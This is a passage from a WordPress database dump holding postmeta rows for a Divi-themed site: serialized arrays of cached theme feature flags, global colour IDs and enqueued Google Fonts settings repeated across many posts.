dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33425,1257,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33426,1257,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33427,1257,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33420,601,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33421,601,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33422,601,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33419,606,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33416,606,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33417,606,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33418,606,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33411,708,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33412,662,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33413,662,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33414,662,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33415,662,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33407,733,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33408,708,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33409,708,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33410,708,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33404,733,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33405,733,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33406,733,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33396,750,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33397,750,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33398,750,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33399,750,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33400,748,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33401,748,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33402,748,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33403,748,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33387,854,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33388,728,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33389,728,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33390,728,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33391,728,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33392,768,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33393,768,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33394,768,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33395,768,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33379,936,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33380,866,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33381,866,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33382,866,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33383,866,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33384,854,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33385,854,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33386,854,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33376,936,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33377,936,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33378,936,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33372,950,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33373,950,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33374,950,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"